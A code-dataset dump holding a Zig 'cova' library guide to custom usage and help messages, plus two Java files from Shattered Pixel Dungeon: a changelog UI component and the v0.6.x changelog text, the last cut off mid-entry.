"qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00JCIV00/cova | docs/guides/parsing_analysis/usage_help.md | # Usage & Help Message
By default, Usage and Help messages are created based on the metadata of Arguments, and are displayed when there's an error during Parsing. Setting up the display for Usage and Help messages is as simple as setting up each Argument as seen in their respective guides. That said, the way they are created and the criteria for when they're displayed can be fully customized by the libary user.
## Parsing Error Messages
The `cova.ParseConfig.err_reaction` field is used to help control what the end user sees if there's an error during parsing. In particular, it allows for a Usage message, a Help message, or no message at all to be displayed following an error.
## Argument Usage & Help Functions
Each Argument Type has `usage()` and `help()` functions that can be called on an Argument to create messages. The most commonly used of these functions are `cova.Command.Custom.usage`() and `cova.Command.Custom.help`() which create and write out a Usage or Help message based on the Command's sub Arguments.
## Custom Usage & Help Formats
The Config for each Argument Type provides Format fields with the `_fmt` suffix that can be used to customize how Usage and Help messages are displayed. These Format fields are each documented with their required format placeholders (details for those can be found in `std.fmt.format`).
Example:
```zig
pub const CommandT = cova.Command.Custom(.{
.global_help_prefix="Cova Usage & Help Example",
.help_header_fmt =
\\ {s}COMMAND: {s}
\\
\\ {s}DESCRIPTION: {s}
\\
\\
,
.opt_config = .{
usage_fmt = "{c}{?c}, {s}{?s} <{s} ({s})>",
},
});
```
## Custom Usage & Help Callback Functions
For greater flexibiliy, custom Usage & Help callback functions can be provided for each Argument Type. These functions can be given directly to an Argument, to each Value or Option with a specific Child Type, or globally to all Arguments of an Argument Type; in that order of precendence.
Example:
```zig
pub const CommandT = cova.Command.Custom(.{
.global_help_prefix="Cova Usage & Help Example",
// Command Global Help Function
.global_help_fn = struct{
fn help(self: anytype, writer: anytype, _: mem.Allocator) !void {
const CmdT = @TypeOf(self.*);
const OptT = CmdT.OptionT;
const indent_fmt = CmdT.indent_fmt;
try writer.print("{s}\n", .{ self.help_prefix });
try self.usage(writer);
try writer.print("\n", .{});
try writer.print(CmdT.help_header_fmt, .{
indent_fmt, self.name,
indent_fmt, self.description
});
if (self.sub_cmds) |cmds| {
try writer.print("SUBCOMMANDS\n", .{});
for (cmds) |cmd| {
try writer.print("{s}{s}: {s}\n", .{
indent_fmt,
cmd.name,
cmd.description,
});
}
try writer.print("\n", .{});
}
if (self.opts) |opts| {
try writer.print("OPTIONS\n", .{});
for (opts) |opt| {
try writer.print(
\\{s}{s}{s} "{s} ({s})"
\\{s}{s}{s}
\\
\\
, .{
indent_fmt,
OptT.long_prefix orelse OptT.short_prefix, opt.long_name orelse "",
opt.val.name(), opt.val.childType(),
indent_fmt, indent_fmt,
opt.description,
}
);
}
}
if (self.vals) |vals| {
try writer.print("VALUES\n", .{});
for (vals) |val| {
try writer.print("{s}", .{ indent_fmt });
try val.usage(writer);
try writer.print("\n", .{});
}
try writer.print("\n", .{});
}
}
}.help,
.opt_config = .{
// Option Global Help Function
.global_help_fn = struct{
fn help(self: anytype, writer: anytype, _: mem.Allocator) !void {
const indent_fmt = @TypeOf(self.*).indent_fmt;
try self.usage(writer);
try writer.print("\n{?s}{?s}{?s}{s}", .{ indent_fmt, indent_fmt, indent_fmt, self.description });
}
}.help
},
```
| 4,603 | usage_help | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.02324571, "qsc_doc_frac_words_redpajama_stop": 0.2514758, "qsc_doc_num_sentences": 96.0, "qsc_doc_num_words": 548, "qsc_doc_num_chars": 4603.0, "qsc_doc_num_lines": 103.0, "qsc_doc_mean_word_length": 4.50182482, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.28284672, "qsc_doc_entropy_unigram": 4.54256282, "qsc_doc_frac_words_all_caps": 0.00590319, "qsc_doc_frac_lines_dupe_lines": 0.45744681, "qsc_doc_frac_chars_dupe_lines": 0.18746339, "qsc_doc_frac_chars_top_2grams": 0.01297122, "qsc_doc_frac_chars_top_3grams": 0.07377381, "qsc_doc_frac_chars_top_4grams": 0.01134982, "qsc_doc_frac_chars_dupe_5grams": 0.27361167, "qsc_doc_frac_chars_dupe_6grams": 0.2290231, "qsc_doc_frac_chars_dupe_7grams": 0.18646129, "qsc_doc_frac_chars_dupe_8grams": 0.18321848, "qsc_doc_frac_chars_dupe_9grams": 0.16700446, "qsc_doc_frac_chars_dupe_10grams": 0.13457641, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 21.67980296, "qsc_doc_frac_chars_hyperlink_html_tag": 0.00238975, "qsc_doc_frac_chars_alphabet": 0.81960133, "qsc_doc_frac_chars_digital": 0.0, "qsc_doc_frac_chars_whitespace": 0.34607864, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/ChangeInfo.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.scenes.PixelScene;
import com.shatteredpixel.shatteredpixeldungeon.ui.RenderedTextBlock;
import com.watabou.noosa.ColorBlock;
import com.watabou.noosa.ui.Component;
import java.util.ArrayList;
public class ChangeInfo extends Component {
protected ColorBlock line;
private RenderedTextBlock title;
public boolean major;
private RenderedTextBlock text;
private ArrayList<ChangeButton> buttons = new ArrayList<>();
public ChangeInfo( String title, boolean majorTitle, String text){
super();
if (majorTitle){
this.title = PixelScene.renderTextBlock( title, 9 );
line = new ColorBlock( 1, 1, 0xFF222222);
add(line);
} else {
this.title = PixelScene.renderTextBlock( title, 6 );
line = new ColorBlock( 1, 1, 0xFF333333);
add(line);
}
major = majorTitle;
add(this.title);
if (text != null && !text.equals("")){
this.text = PixelScene.renderTextBlock(text, 6);
add(this.text);
}
}
public void hardlight( int color ){
title.hardlight( color );
}
public void addButton( ChangeButton button ){
buttons.add(button);
add(button);
button.setSize(16, 16);
layout();
}
public boolean onClick( float x, float y ){
for( ChangeButton button : buttons){
if (button.inside(x, y)){
button.onClick();
return true;
}
}
return false;
}
@Override
protected void layout() {
float posY = this.y + 3;
if (major) posY += 2;
title.setPos(
x + (width - title.width()) / 2f,
posY
);
PixelScene.align( title );
posY += title.height() + 2;
if (text != null) {
text.maxWidth((int) width());
text.setPos(x, posY);
posY += text.height();
}
float posX = x;
float tallest = 0;
for (ChangeButton change : buttons){
if (posX + change.width() >= right()){
posX = x;
posY += tallest;
tallest = 0;
}
//centers
if (posX == x){
float offset = width;
for (ChangeButton b : buttons){
offset -= b.width();
if (offset <= 0){
offset += b.width();
break;
}
}
posX += offset / 2f;
}
change.setPos(posX, posY);
posX += change.width();
if (tallest < change.height()){
tallest = change.height();
}
}
posY += tallest + 2;
height = posY - this.y;
if (major) {
line.size(width(), 1);
line.x = x;
line.y = y+2;
} else if (x == 0){
line.size(1, height());
line.x = width;
line.y = y;
} else {
line.size(1, height());
line.x = x;
line.y = y;
}
}
} | 3,393 | ChangeInfo | java | en | java | code | {"qsc_code_num_words": 427, "qsc_code_num_chars": 3393.0, "qsc_code_mean_word_length": 5.09601874, "qsc_code_frac_words_unique": 0.3676815, "qsc_code_frac_chars_top_2grams": 0.01654412, "qsc_code_frac_chars_top_3grams": 0.01792279, "qsc_code_frac_chars_top_4grams": 0.02619485, "qsc_code_frac_chars_dupe_5grams": 0.11810662, "qsc_code_frac_chars_dupe_6grams": 0.05284926, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02146416, "qsc_code_frac_chars_whitespace": 0.23106396, "qsc_code_size_file_byte": 3393.0, "qsc_code_num_lines": 152.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 22.32236842, "qsc_code_frac_chars_alphabet": 0.81257187, "qsc_code_frac_chars_comments": 0.23253758, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0952381, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00767754, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03809524, "qsc_codejava_score_lines_no_logic": 0.15238095, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_6_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Badges;
import com.shatteredpixel.shatteredpixeldungeon.effects.BadgeBanner;
import com.shatteredpixel.shatteredpixeldungeon.items.DewVial;
import com.shatteredpixel.shatteredpixeldungeon.items.Torch;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.curses.Bulk;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.CloakOfShadows;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.DriedRose;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.EtherealChains;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.HornOfPlenty;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.TalismanOfForesight;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.TimekeepersHourglass;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.UnstableSpellbook;
import com.shatteredpixel.shatteredpixeldungeon.items.food.Food;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfHealing;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfElements;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfEnergy;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfEvasion;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfMight;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfSharpshooting;
import com.shatteredpixel.shatteredpixeldungeon.items.rings.RingOfWealth;
import com.shatteredpixel.shatteredpixeldungeon.items.stones.StoneOfAugmentation;
import com.shatteredpixel.shatteredpixeldungeon.items.stones.StoneOfEnchantment;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfCorrosion;
import com.shatteredpixel.shatteredpixeldungeon.items.wands.WandOfCorruption;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.curses.Wayward;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.enchantments.Lucky;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Dagger;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Flail;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Greataxe;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.ChangesScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import com.watabou.noosa.Image;
import java.util.ArrayList;
public class v0_6_X_Changes {
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
add_v0_6_5_Changes(changeInfos);
add_v0_6_4_Changes(changeInfos);
add_v0_6_3_Changes(changeInfos);
add_v0_6_2_Changes(changeInfos);
add_v0_6_1_Changes(changeInfos);
add_v0_6_0_Changes(changeInfos);
}
public static void add_v0_6_5_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.6.5", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released May 3rd, 2018\n" +
"_-_ 32 days after Shattered v0.6.4\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new StoneOfAugmentation(),
"The weightstone is now the runestone of augmentation!\n\n" +
"Usability on weapons unchanged, can still be used to enhance either speed or damage at the cost of the other.\n\n" +
"Can now be used on armor! Armor can be modified to enhance either defense or evasion, at the cost of the other.\n\n" +
"Every shop now stocks a runestone of augmentation and an ankh, instead of one or the other."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARMOR_CLOTH, new Bulk().glowing()), "New Curses",
"Added 4 new curses:\n\n" +
"_-_ Friendly curse makes weapons sometimes charm both you and the enemy.\n" +
"_-_ Elastic curse lets weapons apply knockback, but reduces damage to 0.\n\n" +
"_-_ Bulk curse makes armor large, slowing movement through doorways.\n" +
"_-_ Overgrowth curse causes random plant effects when you are struck."));
changes.addButton( new ChangeButton(BadgeBanner.image(Badges.Badge.CHAMPION_3.image), "New and Changed Badges",
"_-_ Added badges for winning with 3 challenges at once and 6 challenges at once.\n\n" +
"_-_ 'Death by glyph' badge is now 'death by deferred damage'.\n\n" +
"_-_ Removed rare monster slayer badge."));
changes.addButton( new ChangeButton(new Image(Assets.WARRIOR, 0, 90, 12, 15), "Berserker",
"Even with recent nerfs the berserker is still much stronger than other subclasses. Rather than continually nerfing his existing mechanics, which makes the subclass unfun, I have instead opted to give him a small rework.\n\n" +
"These changes focus on giving the berserker some of his old power back, but making it more difficult to access that power.\n\n" +
"_-_ Rage is built by taking physical damage\n" +
"_-_ Rage fades over time, lasts longer at low HP\n" +
"_-_ Rage builds faster with better armor\n" +
"_-_ Rage grants bonus damage, max of +50%\n" +
"_-_ Berserker now needs full rage to berserk\n" +
"_-_ Berserking no longer reduces max hp\n" +
"_-_ Berserk bonus shielding doubled\n" +
"_-_ Berserk bonus damage reduced to +50%\n" +
"_-_ Removed exhaustion damage penalty\n" +
"_-_ Berserker can't gain rage while recovering"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.STYLUS, null), "Glyph Changes",
"Glyphs were originally designed with the intention that taking no glyph should be a valid option. Now with augmenting armor, glyphs can be more about added bonuses, somewhat like enchantments. Several glyphs have been adjusted:\n\n" +
"_-_ Entanglement now only roots if you stand still.\n\n" +
"_-_ Potential no longer self-damages and grants charge more consistently.\n\n" +
"_-_ Viscocity now always defers some damage, instead of sometimes deferring all damage.\n\n" +
"_-_ Stone reworked. Now sets evasion to 0 and grants armor in proportion to evasion.\n\n" +
"_-_ Swiftness reworked. Now grants movement speed when no enemies are near.\n\n" +
"_-_ Viscocity is now a common glyph, Stone is now uncommon."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ All bags now have 20 spaces. Previously only the default bag had 20, and the others had 12.\n\n" +
"_-_ Updated the sprites for runestones and throwing stones\n\n" +
"_-_ Loading screen transitions are now faster in many cases\n\n" +
"_-_ Improved the layout of translator credits in landscape"));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various rare crash bugs\n" +
"_-_ Antimagic applying to elemental damage\n" +
"_-_ 'Happy end' badge not appearing in rankings\n" +
"_-_ 'Death from falling' badge not triggering\n" +
"_-_ Hero rarely appearing alive when dead\n" +
"_-_ Sungrass not interrupting resting at full hp\n" +
"_-_ Timekeeper's hourglass unusable at 1 charge\n" +
"_-_ Artifacts rarely appearing when blocked by a challenge\n" +
"_-_ Hero spending a turn before actually opening a lock\n" +
"_-_ Specific cases where an invisible hero would not surprise attack\n" +
"_-_ Shields granting full defense when hero does not have enough strength\n" +
"_-_ Piranha incorrectly being affect by vertigo\n" +
"_-_ Ambitious imp spawning on top of traps\n" +
"_-_ Enemies spawning faster than intended in specific cases"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SWORD, new Lucky().glowing()), "Lucky Enchantment",
"The Lucky enchant is a nice overall DPS increase, but comes at the cost of consistency. The problem is that with a bit of bad luck it's possible to do 0x damage many times in a row.\n\n" +
"Lucky has been adjusted to reign in the extremes of bad luck, and to give a little more strategy to using it.\n\n" +
"_-_ Base chance to deal 2x damage reduced to 50% from 60%\n" +
"_-_ Each time 0x damage is dealt, the next hit will be much more likely to deal 2x damage"));
changes.addButton( new ChangeButton(new Image(Assets.MAGE, 0, 90, 12, 15), "Warlock",
"Soul mark chance changed. Now has a 10% chance to activate per wand level, stacking multiplicatively, with a base of 10% at +0.\n" +
"e.g. +0 is 10%, +1 is 19%, +2 is 27%, etc.\n\n" +
"Previous soul mark chance was 9% at base plus 6% per level, stacking linearly.\n\n" +
"This substantially increases soul mark chance at wand levels +1 to +5"));
changes.addButton( new ChangeButton( new Image(Assets.HUNTRESS, 0, 15, 12, 15), "Huntress",
"Huntress ranged weapon durability boost now stacks with magical holster durability boost, for a total of 180% durability."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SHORTSWORD, new Wayward().glowing()), "Wayward curse",
"Wayward's accuracy penalty was very extreme, often making it impossible to win fights without doors. Wayward should punish non-guaranteed attacks, but this extent of this has been lessened.\n\n" +
"_-_ Reduced wayward accuracy penalty by 50%"));
changes.addButton( new ChangeButton(new Image(Assets.SKELETON, 0, 0, 12, 15), "Skeletons",
"Skeletons have been adjusted to be more counterable with armor, and to give less inventory-clogging loot.\n\n" +
"_-_ Bone explosion damage up to 6-12 from 2-10\n" +
"_-_ Armor is now 2x effective against bone explosion, up from 0.5x\n\n" +
"_-_ Loot drop chance reduced to 1/8, from 1/5"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.KIT, null), "Rogue Garb and Huntress Cloak",
"Eventually I want to totally overhaul class armors. In the meantime though, two of the armors are disproportionately powerful with mind vision, and need to be adjusted:\n\n" +
"_-_ Rogue's smoke bomb now has a max range of 8 and does not go through walls\n\n" +
"_-_ Huntress's spectral blades now have a max range of 12"));
}
public static void add_v0_6_4_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.6.4", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released April 1st, 2018\n" +
"_-_ 46 days after Shattered v0.6.3\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(Icons.get(Icons.CHALLENGE_ON), "Challenges",
"Challenges have received several major changes, with the goal of making them more fair and interesting.\n" +
"\n" +
"_-_ Challenges now have descriptions\n" +
"\n" +
"_-_ On diet now provides small rations, rather than removing all food\n" +
"_-_ Cloth armor is now allowed on faith is my armor\n" +
"_-_ Pharmacophobia is unchanged\n" +
"_-_ Barren land now allows seeds to drop, but they cannot be planted\n" +
"_-_ Swarm intelligence now draws nearby enemies, not all enemies\n" +
"_-_ Into darkness now limits light more harshly, but provides torches\n" +
"_-_ Forbidden runes now removes 50% of upgrade scrolls, and no other scrolls"));
changes.addButton( new ChangeButton(Icons.get(Icons.INFO), "Start game UI",
"The interface for starting and loading a game has been completely overhauled!\n" +
"\n" +
"_-_ Game now supports 4 save slots of any hero class, rather than 1 slot per class\n" +
"_-_ Hero select and challenge select are now more streamlined and informative\n" +
"_-_ Hero select is now a window, offering more flexibility of where games can be started\n" +
"_-_ More details are now shown for games in progress before they are loaded"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.CROSSBOW, null), "New Weapons",
"Three new weapons have been added!\n" +
"\n" +
"Throwing spears are a basic tier 3 missile weapon, fishing spears have been reduced to tier 2. Tiers 2-5 now each have a basic missile weapon.\n" +
"\n" +
"The crossbow is a tier 4 melee weapon which enhances darts! You'll do less damage up-front, but thrown darts will pack a punch!\n" +
"\n" +
"The gauntlet is a tier 5 fast melee weapon, similar to the sai. Excellent for chaining combos or enchantments."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.HOLSTER, null), "Inventory changes",
"Since the ranged weapon improvements in 0.6.3, inventory space has become a bit too congested. Rather than make a small change that only helps the issue for a few more updates, I have decided to make a larger-scale adjustment to available inventory space:\n" +
"\n" +
"_-_ The wand holster is now the magical holster, and can store missile weapons as well as wands.\n" +
"\n" +
"_-_ The seed pouch is now the velvet pouch, and can store runestones as well as seeds.\n" +
"\n" +
"_-_ Every hero now starts the game with an extra container."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ It is now possible to back up game data using ADB backup on android 4.0+ and android auto-backup on android 6.0+. Runs in progress are not backed up to prevent cheating.\n" +
"\n" +
"_-_ Firebloom plants will no longer appear in garden rooms. Accidentally running into them is massively more harmful than any other plant.\n" +
"\n" +
"_-_ Mage and Warrior tutorial functionality has been removed, as more players found it confusing than helpful.\n" +
"\n" +
"_-_ Added a new visual effect to the loading screen\n" +
"\n" +
"_-_ Piranha treasure rooms now have a one tile wide buffer\n" +
"\n" +
"_-_ Bags are now unsellable\n" +
"\n" +
"_-_ The dwarf king is now immune to blindness\n" +
"\n" +
"_-_ Made adjustments to sending gameplay data. Data use should be slightly reduced."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Crashes involving corrupted mimics\n" +
"_-_ Various rare crash bugs\n" +
"_-_ Various minor visual bugs\n" +
"_-_ Skeletons exploding when falling in chasms\n" +
"_-_ Thrown weapons lost when used on sheep\n" +
"_-_ Warden gaining benefits from rotberry bush\n" +
"_-_ Rare cases where music wouldn't play\n" +
"_-_ Unstable enchant not being able to activate venom"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new TimekeepersHourglass(),
"The timekeeper's hourglass has been adjusted to cap at 10 charges, instead of 20, and to have a bit more power without upgrades:\n" +
"\n" +
"_-_ Number of charges halved\n" +
"_-_ 2x freeze duration per charge\n" +
"_-_ 5x stasis duration per charge\n" +
"_-_ Overall recharge speed increased at +0, unchanged at +10"));
changes.addButton( new ChangeButton(new TalismanOfForesight(),
"The talisman of foresight now builds power for scrying slightly faster\n" +
"\n" +
"_-_ Charge speed increased by 20% at +0, scaling to 50% increased at +10\n" +
"_-_ Charge gain when discovering traps unchanged"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.BUFFS_LARGE, 64, 0, 16, 16), "Paralysis changes",
"Paralysis is an extremely powerful debuff, and its ability to completely immobilize the player or an enemy while they are killed needs to be adjusted.\n" +
"\n" +
"Chance to resist paralysis is now based on all recent damage taken while paralyzed, instead of each specific instance of damage separately.\n" +
"\n" +
"This means that after taking around half current HP in damage, breaking from paralysis becomes very likely, and immediately re-applying paralysis will not reset this resist chance."));
changes.addButton( new ChangeButton(new Image(Assets.TILES_SEWERS, 48, 48, 16, 16), "Chasm changes",
"Dropping enemies into chasms is a very fun way to deal with enemies, but killing an enemy instantly and getting almost the full reward is simply too strong. This change should keep killing via chasms fun and useful, without it being as strong.\n" +
"\n" +
"_-_ Enemies killed via chasms now only award 50% exp"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SEED_SUNGRASS, null), "Seed adjustments",
